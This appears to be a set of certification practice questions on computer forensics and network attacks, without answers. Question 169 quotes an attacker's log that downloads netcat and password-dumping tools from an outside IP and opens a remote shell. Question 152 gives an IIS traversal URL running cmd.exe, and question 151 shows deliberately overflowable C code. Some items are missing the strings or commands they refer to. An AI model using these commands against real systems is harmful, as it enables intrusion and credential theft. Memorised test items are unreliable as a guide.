Which OWASP IoT vulnerability covers security flaws such as lack of firmware validation, lack of secure delivery, and lack of anti-rollback mechanisms on IoT devices?

A.

Lack of secure update mechanism

B.

Use of insecure or outdated components

C.

Insecure default settings

D.

Insecure data transfer and storage

Question # 128

According to RFC 3227, which of the following is considered the most volatile item on a typical system?

A.

Registers and cache

B.

Temporary system files

C.

Archival media

D.

Kernel statistics and memory

Question # 129

You are the incident response manager at a regional bank. While performing routine auditing of web application logs, you find several attempted login submissions that contain the following strings:


What kind of attack has occurred?

A.

SQL injection

B.

Buffer overflow

C.

Cross-site scripting

D.

Cross-site request forgery

Question # 130

Adam is thinking of establishing a hospital in the US and approaches John, a software developer, to build a site and host it for him on one of the servers, which would be used to store patient health records. He has learned from his legal advisors that he needs to have the server's log data reviewed and managed according to certain standards and regulations. Which of the following regulations are the legal advisors referring to?

A.

Data Protection Act of 2018

B.

Payment Card Industry Data Security Standard (PCI DSS)

C.

Electronic Communications Privacy Act

D.

Health Insurance Portability and Accountability Act of 1996 (HIPAA)

Question # 131

Place the following in order of volatility, from most volatile to least volatile.

A.

Registers and cache, routing tables, temporary file systems, disk storage, archival media

B.

Register and cache, temporary file systems, routing tables, disk storage, archival media

C.

Registers and cache, routing tables, temporary file systems, archival media, disk storage

D.

Archival media, temporary file systems, disk storage, archival media, register and cache

Question # 132

Rule 1002 of the Federal Rules of Evidence (US) talks about _____

A.

Admissibility of original

B.

Admissibility of duplicates

C.

Requirement of original

D.

Admissibility of other evidence of contents

Question # 133

Which of the following files stores the MySQL database data permanently, including data that has been deleted, helping the forensic investigator in examining the case and finding the culprit?

A.

mysql-bin

B.

mysql-log

C.

iblog

D.

ibdata1

Question # 134

NTFS sets a flag for the file once you encrypt it and creates an EFS attribute where it stores the Data Decryption Field (DDF) and Data Recovery Field (DRF). Which of the following is not a part of the DDF?

A.

Encrypted FEK

B.

Checksum

C.

EFS Certificate Hash

D.

Container Name

Question # 135

Lynne receives the following email:

Dear lynne@gmail.com! We are sorry to inform you that your ID has been temporarily frozen due to incorrect or missing information saved at 2016/11/10 20:40:24

You have 24 hours to fix this problem or risk to be closed permanently!

To proceed Please Connect >> My Apple ID

Thank You

The link to My Apple ID shows http://byggarbetsplatsen.se/backup/signon/

What type of attack is this?

A.

Mail Bombing

B.

Phishing

C.

Email Spamming

D.

Email Spoofing

Question # 136

Which of the following techniques deletes files permanently?

A.

Steganography

B.

Artifact Wiping

C.

Data Hiding

D.

Trail obfuscation

Question # 137

Which of the following is a device monitoring tool?

A.

Capsa

B.

Driver Detective

C.

Regshot

D.

RAM Capturer

Question # 138

Which of the following tools can reverse machine code to assembly language?

A.

PEiD

B.

RAM Capturer

C.

IDA Pro

D.

Deep Log Analyzer

Question # 139

You are running known exploits against your network to test for possible vulnerabilities. To test the strength of your antivirus software, you load a test network to mimic your production network. Your software successfully blocks some simple macro and encrypted viruses. You decide to really test the software by using virus code where the code rewrites itself entirely and the signatures change from child to child, but the functionality stays the same. What type of virus is this that you are testing?

A.

Polymorphic

B.

Metamorphic

C.

Oligomorphic

D.

Transmorphic

Question # 140

You are conducting an investigation of fraudulent claims in an insurance company that involves complex text searches through large numbers of documents. Which of the following tools would allow you to quickly and efficiently search for a string within a file on the bitmap image of the target computer?

A.

Stringsearch

B.

grep

C.

dir

D.

vim

Question # 141

You have used a newly released forensic investigation tool, which doesn't meet the Daubert Test, during a case. The case has ended up in court. What argument could the defense make to weaken your case?

A.

The tool hasn't been tested by the International Standards Organization (ISO)

B.

Only the local law enforcement should use the tool

C.

The tool has not been reviewed and accepted by your peers

D.

You are not certified for using the tool

Question # 142

Before you are called to testify as an expert, what must an attorney do first?

A.

engage in damage control

B.

prove that the tools you used to conduct your examination are perfect

C.

read your curriculum vitae to the jury

D.

qualify you as an expert witness

Question # 143

Software firewalls work at which layer of the OSI model?

A.

Application

B.

Network

C.

Transport

D.

Data Link

Question # 144

When conducting computer forensic analysis, you must guard against ______________ so that you remain focused on the primary job and ensure that the level of work does not increase beyond what was originally expected.

A.

Hard Drive Failure

B.

Scope Creep

C.

Unauthorized expenses

D.

Overzealous marketing

Question # 145

Why are Linux/Unix based computers better to use than Windows computers for idle scanning?

A.

Linux/Unix computers are easier to compromise

B.

Linux/Unix computers are constantly talking

C.

Windows computers are constantly talking

D.

Windows computers will not respond to idle scans

Question # 146

You work as an IT security auditor hired by a law firm in Boston to test whether you can gain access to sensitive information about the company's clients. You have rummaged through their trash and found very little information. You do not want to set off any alarms on their network, so you plan on performing passive footprinting against their Web servers. What tool should you use?

A.

Ping sweep

B.

Nmap

C.

Netcraft

D.

Dig

Question # 147

You are working on a thesis for your doctorate degree in Computer Science. Your thesis is based on HTML, DHTML, and other web-based languages and how they have evolved over the years.

You navigate to archive.org and view the HTML code of news.com. You then navigate to the current news.com website and copy over the source code. While searching through the code, you come across something abnormal: What have you found?

A.

Web bug

B.

CGI code

C.

Trojan.downloader

D.

Blind bug

Question # 148

You are the security analyst working for a private company out of France. Your current assignment is to obtain credit card information from a Swiss bank owned by that company. After initial reconnaissance, you discover that the bank security defenses are very strong and would take too long to penetrate. You decide to get the information by monitoring the traffic between the bank and one of its subsidiaries in London. After monitoring some of the traffic, you see a lot of FTP packets traveling back and forth. You want to sniff the traffic and extract usernames and passwords. What tool could you use to get this information?

A.

Airsnort

B.

Snort

C.

Ettercap

D.

RaidSniff

Question # 149

You should make at least how many bit-stream copies of a suspect drive?

A.

1

B.

2

C.

3

D.

4

Question # 150

When obtaining a warrant, it is important to:

A.

particularly describe the place to be searched and particularly describe the items to be seized

B.

generally describe the place to be searched and particularly describe the items to be seized

C.

generally describe the place to be searched and generally describe the items to be seized

D.

particularly describe the place to be searched and generally describe the items to be seized

Question # 151

Kyle is performing the final testing of an application he developed for the accounting department.

His last round of testing is to ensure that the program is as secure as possible. Kyle compiles and runs the following code. What is he testing at this point?

#include <stdio.h>
#include <string.h>

int main(int argc, char *argv[]) {
    char buffer[10];
    if (argc < 2) {
        fprintf(stderr, "USAGE: %s string\n", argv[0]);
        return 1;
    }
    strcpy(buffer, argv[1]);   /* unbounded copy of argv[1] into a 10-byte stack buffer */
    return 0;
}

A.

Buffer overflow

B.

SQL injection

C.

Format string bug

D.

Kernel injection

Question # 152

What will the following URL produce in an unpatched IIS Web Server?

http://www.thetargetsite.com/scripts/..%c0%af../..%c0%af../windows/system32/cmd.exe?/c+dir+c:\

A.

Directory listing of C: drive on the web server

B.

Insert a Trojan horse into the C: drive of the web server

C.

Execute a buffer overflow in the C: drive of the web server

D.

Directory listing of the C:\windows\system32 folder on the web server

Question # 153

You are contracted to work as a computer forensics investigator for a regional bank that has four 30 TB storage area networks that store customer data.

What method would be most efficient for you to acquire digital evidence from this network?

A.

create a compressed copy of the file with DoubleSpace

B.

create a sparse data copy of a folder or file

C.

make a bit-stream disk-to-image file

D.

make a bit-stream disk-to-disk file

Question # 154

The offset in a hexadecimal code is:

A.

The last byte after the colon

B.

The 0x at the beginning of the code

C.

The 0x at the end of the code

D.

The first byte after the colon

Question # 155

Jessica works as systems administrator for a large electronics firm. She wants to scan her network quickly to detect live hosts by using ICMP ECHO Requests. What type of scan is Jessica going to perform?

A.

Tracert

B.

Smurf scan

C.

Ping trace

D.

ICMP ping sweep

Question # 156

What will the following command accomplish?

A.

Test ability of a router to handle over-sized packets

B.

Test the ability of a router to handle under-sized packets

C.

Test the ability of a WLAN to handle fragmented packets

D.

Test the ability of a router to handle fragmented packets

Question # 157

To preserve digital evidence, an investigator should ____________________.

A.

Make two copies of each evidence item using a single imaging tool

B.

Make a single copy of each evidence item using an approved imaging tool

C.

Make two copies of each evidence item using different imaging tools

D.

Only store the original evidence item

Question # 158

Michael works for Kimball Construction Company as a senior security analyst. As part of the yearly security audit, Michael scans his network for vulnerabilities. Using Nmap, Michael conducts an XMAS scan, and most of the ports scanned do not give a response. In what state are these ports?

A.

Closed

B.

Open

C.

Stealth

D.

Filtered

Question # 159

In general, __________________ involves the investigation of data that can be retrieved from the hard disk or other disks of a computer by applying scientific methods to retrieve the data.

A.

Network Forensics

B.

Data Recovery

C.

Disaster Recovery

D.

Computer Forensics

Question # 160

What does the acronym POST mean as it relates to a PC?

A.

Primary Operations Short Test

B.

Power-On Self Test

C.

Pre Operational Situation Test

D.

Primary Operating System Test

Question # 161

Windows identifies which application to open a file with by examining which of the following?

A.

The file extension

B.

The file attributes

C.

The file signature at the end of the file

D.

The file signature at the beginning of the file

Question # 162

In Microsoft file structures, sectors are grouped together to form:

A.

Clusters

B.

Drives

C.

Bitstreams

D.

Partitions

Question # 163

Kimberly is studying to be an IT security analyst at a vocational school in her town. The school offers many different programming as well as networking languages. What networking protocol language should she learn that routers utilize?

A.

ATM

B.

UDP

C.

BGP

D.

OSPF

Question # 164

You are a security analyst performing reconnaissance on a company you will be carrying out a penetration test for. You conduct a search for IT jobs on Dice.com and find the following information for an open position:

7+ years experience in Windows Server environment
5+ years experience in Exchange 2000/2003 environment
Experience with Cisco Pix Firewall, Linksys 1376 router, Oracle 11i and MYOB v3.4 Accounting software are required
MCSA desired, MCSE, CEH preferred
No Unix/Linux Experience needed

What is this information posted on the job website considered?

A.

Social engineering exploit

B.

Competitive exploit

C.

Information vulnerability

D.

Trade secret

Question # 165

When investigating a network that uses DHCP to assign IP addresses, where would you look to determine which system (MAC address) had a specific IP address at a specific time?

A.

on the individual computer's ARP cache

B.

in the Web Server log files

C.

in the DHCP Server log files

D.

there is no way to determine the specific IP address

Question # 166

____________________ is simply the application of computer investigation and analysis techniques in the interests of determining potential legal evidence.

A.

Network Forensics

B.

Computer Forensics

C.

Incident Response

D.

Event Reaction

Question # 167

What happens when a file is deleted by a Microsoft operating system using the FAT file system?

A.

only the reference to the file is removed from the FAT

B.

the file is erased and cannot be recovered

C.

a copy of the file is stored and the original file is erased

D.

the file is erased but can be recovered

Question # 168

When you are running a vulnerability scan on a network and the IDS cuts off your connection, what type of IDS is being used?

A.

Passive IDS

B.

Active IDS

C.

Progressive IDS

D.

NIPS

Question # 169

The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Snort reported Unicode attacks from 213.116.251.162. The File Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini.

He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious user to construct SQL statements that will execute shell commands (such as CMD.EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly. The attacker makes an RDS query which results in the commands run as shown below.

"cmd1.exe /c open 213.116.251.162 >ftpcom"

"cmd1.exe /c echo johna2k >>ftpcom"

"cmd1.exe /c echo haxedj00 >>ftpcom"

"cmd1.exe /c echo get nc.exe >>ftpcom"

"cmd1.exe /c echo get pdump.exe >>ftpcom"

"cmd1.exe /c echo get samdump.dll >>ftpcom"

"cmd1.exe /c echo quit >>ftpcom"

"cmd1.exe /c ftp -s:ftpcom"

"cmd1.exe /c nc -l -p 6969 -e cmd1.exe"

What can you infer from the exploit given?

A.

It is a local exploit where the attacker logs in using username johna2k

B.

There are two attackers on the system - johna2k and haxedj00

C.

The attack is a remote exploit and the hacker downloads three files

D.

The attacker is unsuccessful in spawning a shell as he has specified a high end UDP port

Question # 170

John is using Firewalk to test the security of his Cisco PIX firewall. He is also utilizing a sniffer located on a subnet that resides deep inside his network. After analyzing the sniffer log files, he does not see any of the traffic produced by Firewalk. Why is that?

A.

Firewalk cannot pass through Cisco firewalls

B.

Firewalk sets all packets with a TTL of zero

C.

Firewalk cannot be detected by network sniffers

D.

Firewalk sets all packets with a TTL of one

Question # 171

Simon is a former employee of Trinitron XML Inc. He feels he was wrongly terminated and wants to hack into his former company's network. Since Simon remembers some of the server names, he attempts to run the axfr and ixfr commands using DIG. What is Simon trying to accomplish here?

A.

Send DOS commands to crash the DNS servers

B.

Perform DNS poisoning

C.

Perform a zone transfer

D.

Enumerate all the users in the domain

Question # 172

After undergoing an external IT audit, George realizes his network is vulnerable to DDoS attacks.

What countermeasures could he take to prevent DDoS attacks?

A.

Enable direct broadcasts

B.

Disable direct broadcasts

C.

Disable BGP

D.

Enable BGP

Question # 173

What is the name of the standard Linux command, also available as a Windows application, that can be used to create bit-stream images?

A.

mcopy

B.

image

C.

MD5

D.

dd

Question # 174

What is kept in the following registry key? HKLM\SECURITY\Policy\Secrets

A.

Cached password hashes for the past 20 users

B.

Service account passwords in plain text

C.

IAS account names and passwords

D.

Local store PKI Kerberos certificates

Question # 175

During the course of an investigation, you locate evidence that may prove the innocence of the suspect of the investigation. You must maintain an unbiased opinion and be objective in your entire fact finding process. Therefore, you report this evidence. This type of evidence is known as:

A.

Inculpatory evidence

B.

Mandatory evidence

C.

Exculpatory evidence

D.

Terrible evidence

Question # 176

The rule of thumb when shutting down a system is to pull the power plug. However, it has certain drawbacks. Which of the following would that be?

A.

Any data not yet flushed to the system will be lost

B.

All running processes will be lost

C.

The /tmp directory will be flushed

D.

Power interruption will corrupt the pagefile

Question # 177

With the standard Linux second extended file system (Ext2fs), a file is deleted when the inode internal link count reaches ________.

A.

0

B.

10

C.

100

D.

1

Question # 178

To make sure the evidence you recover and analyze with computer forensics software can be admitted in court, you must test and validate the software. What group is actively providing tools and creating procedures for testing and validating computer forensics software?

A.

Computer Forensics Tools and Validation Committee (CFTVC)

B.

Association of Computer Forensics Software Manufacturers (ACFSM)

C.

National Institute of Standards and Technology (NIST)

D.

Society for Valid Forensics Tools and Testing (SVFTT)

Question # 179

James is testing the ability of his routers to withstand DoS attacks. James sends ICMP ECHO requests to the broadcast address of his network. What type of DoS attack is James testing against his network?

A.

Smurf

B.

Trinoo

C.

Fraggle

D.

SYN flood

Question # 180

What method of computer forensics will allow you to trace all user accounts ever established on a Windows 2000 server over the course of its lifetime?

A.

forensic duplication of hard drive

B.

analysis of volatile data

C.

comparison of MD5 checksums

D.

review of SIDs in the Registry

Question # 181

George is performing security analysis for Hammond and Sons LLC. He is testing security vulnerabilities of their wireless network. He plans on remaining as "stealthy" as possible during the scan. Why would a scanner like Nessus not be recommended in this situation?

A.

Nessus is too loud

B.

Nessus cannot perform wireless testing

C.

Nessus is not a network scanner

D.

There are no ways of performing a "stealthy" wireless scan

Question # 182

In a computer forensics investigation, what describes the route that evidence takes from the time you find it until the case is closed or goes to court?

A.

rules of evidence

B.

law of probability

C.

chain of custody

D.

policy of separation

Question # 183

Jonathan is a network administrator who is currently testing the internal security of his network. He is attempting to use Ettercap to hijack the session of a user connected to his Web server. Why will Jonathan not succeed?

A.

Only an HTTPS session can be hijacked

B.

HTTP protocol does not maintain session

C.

Only FTP traffic can be hijacked

D.

Only DNS traffic can be hijacked

Question # 184

What information do you need to recover when searching a victim's computer for a crime committed with a specific e-mail message?

A.

Internet service provider information

B.

E-mail header

C.

Username and password

D.

Firewall log

Question # 185

When examining a hard disk without a write-blocker, you should not start Windows, because Windows will write data to the:

A.

Recycle Bin

B.

MSDOS.sys

C.

BIOS

D.

Case files

Question # 186

What binary coding is used most often for e-mail purposes?

A.

MIME

B.

Uuencode

C.

IMAP

D.

SMTP

Question # 187

If you see the files Zer0.tar.gz and copy.tar.gz on a Linux system while doing an investigation, what can you conclude?

A.

The system files have been copied by a remote attacker

B.

The system administrator has created an incremental backup

C.

The system has been compromised using a t0rnrootkit

D.

Nothing in particular as these can be operational files

Question # 188

What type of attack occurs when an attacker can force a router to stop forwarding packets by flooding the router with many open connections simultaneously so that all the hosts behind the router are effectively disabled?

A.

digital attack

B.

denial of service

C.

physical attack

D.

ARP redirect

Question # 189

You are assisting in the investigation of a possible web server hack. The company that called you stated that customers reported that whenever they entered the company's web address in their browser, they received a pornographic web site instead. The company checked the web server and nothing appears wrong. When you type the IP address of the web site into your browser, everything appears normal. What is the name of the attack that affects the DNS cache of the name resolution servers, resulting in those servers directing users to the wrong web site?

A.

ARP Poisoning

B.

DNS Poisoning

C.

HTTP redirect attack

D.

IP Spoofing

Question # 190

At what layer of the OSI model do routers function?

A.

4

B.

3

C.

1

D.

5

Question # 191

If you discover a criminal act while investigating a corporate policy abuse, it becomes a public-sector investigation and should be referred to law enforcement.

A.

true

B.

false

Question # 192

When marking evidence that has been collected with the aa/ddmmyy/nnnn/zz format, what does the nnnn denote?

A.

The year the evidence was taken

B.

The sequence number for the parts of the same exhibit

C.

The initials of the forensics analyst

D.

The sequential number of the exhibits seized

Question # 193

Harold is finishing up a report on a case of network intrusion, corporate spying, and embezzlement that he has been working on for over six months. He is trying to find the right term to use in his report to describe network-enabled spying. What term should Harold use?

A.

Spycrack

B.

Spynet

C.

Netspionage

D.

Hackspionage

Question # 194

The Paraben Lockdown device uses which operating system to write hard drive data?

A.

Mac OS

B.

Red Hat

C.

Unix

D.

Windows

Question # 195

Which of the following is a list of recently used programs or opened files?

A.

Most Recently Used (MRU)

B.

Recently Used Programs (RUP)

C.

Master File Table (MFT)

D.

GUID Partition Table (GPT)

Question # 196

You are asked to build a forensic lab and your manager has specifically informed you to use copper for lining the walls, ceilings, and floor. What is the main purpose of lining the walls, ceilings, and floor with copper?

A.

To control the room temperature

B.

To strengthen the walls, ceilings, and floor

C.

To avoid electromagnetic emanations

D.

To make the lab sound proof

Question # 197

You need to deploy a new web-based software package for your organization. The package requires three separate servers and needs to be available on the Internet. What is the recommended architecture in terms of server placement?

A.

All three servers need to be placed internally

B.

A web server and the database server facing the Internet, an application server on the internal network

C.

A web server facing the Internet, an application server on the internal network, a database server on the internal network

D.

All three servers need to face the Internet so that they can communicate between themselves

Question # 198

John is working as a computer forensics investigator for a consulting firm in Canada. He is called to seize a computer at a local web café purportedly used as a botnet server. John thoroughly scans the computer and finds nothing that would lead him to think the computer was a botnet server. John decides to scan the virtual memory of the computer to possibly find something he had missed. What information will the virtual memory scan produce?

A.

It contains the times and dates of when the system was last patched

B.

It is not necessary to scan the virtual memory of a computer

C.

It contains the times and dates of all the system files

D.

Hidden running processes

Question # 199

Using Linux to carry out a forensics investigation, what would the following command accomplish?

dd if=/usr/home/partition.image of=/dev/sdb2 bs=4096 conv=notrunc,noerror

A.

Search for disk errors within an image file

B.

Backup a disk to an image file

C.

Copy a partition to an image file

D.

Restore a disk from an image file

Question # 200

Which of the following files DOES NOT use Object Linking and Embedding (OLE) technology to embed and link to other objects?

A.

Portable Document Format

B.

MS-office Word Document

C.

MS-office Word OneNote

D.

MS-office Word PowerPoint

Question # 201

What must be obtained before an investigation is carried out at a location?

A.

Search warrant

B.

Subpoena

C.

Habeas corpus

D.

Modus operandi

Question # 202

Where are files temporarily written in Unix when printing?

A.

/usr/spool

B.

/var/print

C.

/spool

D.

/var/spool

Question # 203

What type of flash memory card comes in either Type I or Type II and consumes only five percent of the power required by small hard drives?

A.

SD memory

B.

CF memory

C.

MMC memory

D.

SM memory

Question # 204

Which of the following techniques can be used to beat steganography?

A.

Encryption

B.

Steganalysis

C.

Decryption

D.

Cryptanalysis

Question # 205

The process of restarting a computer that is already turned on, through the operating system, is called:

A.

Warm boot

B.

Ice boot

C.

Hot Boot

D.

Cold boot

Question # 206

Chong-lee, a forensics executive, suspects that malware is continuously making copies of files and folders on a victim system to consume the available disk space. What type of test would confirm his claim?

A.

File fingerprinting

B.

Identifying file obfuscation

C.

Static analysis

D.

Dynamic analysis

Question # 207

Which of the following tools is used to locate IP addresses?

A.

SmartWhois

B.

Deep Log Analyzer

C.

Towelroot

D.

XRY LOGICAL

Question # 208

Brian needs to acquire data from RAID storage. Which of the following acquisition methods is recommended to retrieve only the data relevant to the investigation?

A.

Static Acquisition

B.

Sparse or Logical Acquisition

C.

Bit-stream disk-to-disk Acquisition

D.

Bit-by-bit Acquisition

Question # 209

Amber, a black hat hacker, has embedded malware into a small enticing advertisement and posted it on a popular ad network that displays across various websites. What is she doing?

A.

Malvertising

B.

Compromising a legitimate site

C.

Click-jacking

D.

Spearphishing

Question # 210

Which of the following is a federal law enacted in the US to control the ways that financial institutions deal with the private information of individuals?

A.

SOX

B.

HIPAA 1996

C.

GLBA

D.

PCI DSS

Question # 211

Which of the following commands shows you the username and IP address used to access the system via a remote login session and the type of client from which they are accessing the system?

A.

Net config

B.

Net sessions

C.

Net share

D.

Net stat
